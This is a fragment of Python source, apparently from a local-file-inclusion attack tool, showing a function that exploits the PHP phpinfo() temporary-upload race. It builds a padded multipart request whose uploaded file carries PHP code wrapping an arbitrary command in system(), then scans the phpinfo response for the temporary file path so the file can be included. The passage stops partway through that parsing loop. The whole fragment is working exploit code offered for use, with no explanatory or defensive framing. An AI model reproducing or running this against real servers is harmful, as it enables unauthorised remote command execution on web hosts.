
Function phpinfo_request

(headers,cmd,path1,path,test,host)


635 return got
636
637def phpinfo_request(headers,cmd,path1,path,test,host):
638 rcvbuf = 1024
639 bigz = 3000
640 junkheaders = 30
641 junkfiles = 40
642 junkfilename = '>' * 100000
643 z = "Z" * bigz
644 found = 0
645
646 phpinfo_headers = {'User-Agent':'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8',
647 'Accept-Language':'en-us,en;q=0.5',
648 'Accept-Encoding': 'gzip, deflate',
649 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
650 'Accept-Charset': 'windows-1251,utf-8;q=0.7,*;q=0.7',
651 'z': z,
652 'Connection':'close'}
653
654 if "Cookie" in gen_headers:
655 phpinfo_headers['Cookie'] = gen_headers['Cookie']
656
657 loop = range(0,junkheaders)
658 for count in loop:
659 phpinfo_headers['z%s' %count] = count
660
661 phpinfo_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------59502863519624080131137623865'
662
663 if("php://" in cmd):
664 cmd = cmd[6:]
665 else:
666 cmd = "system('%s')" %cmd
667 if(";" not in cmd[-2:]):
668 cmd = "%s;" %cmd
669
670 content = """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="tfile"; filename="test.html"\nContent-Type: text/html\n\nAbracadabrA <?php %s ?>\n-----------------------------59502863519624080131137623865--""" %(cmd)
671 loop = range(0,junkfiles)
672
673 for count in loop:
674 content = content + """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="ffile%d"; filename="%d%s"\nContent-Type: text/html\n\nno\n-----------------------------59502863519624080131137623865--\n""" %(count,count,junkfilename)
675
676 phpinfo_headers['Content-Length'] = '%s' %(len(content))
677 got = ""
678 url = "%s%s" %(host,path)
679
680 try:
681 if(phpinfo_reverse):
682 r = requests.post(url=url, headers=phpinfo_headers, data=content)
683 else:
684 r = requests.post(url=url, headers=phpinfo_headers, data=content, timeout=20)
685 except:
686 return got
687
688 resp = r.text
689 if("tmp_name" in resp):
690 found = 1
691 lines = resp.split('\n')
692 for line in lines:
693 if "tmp_name]" in line:
694 mystr = str(line)
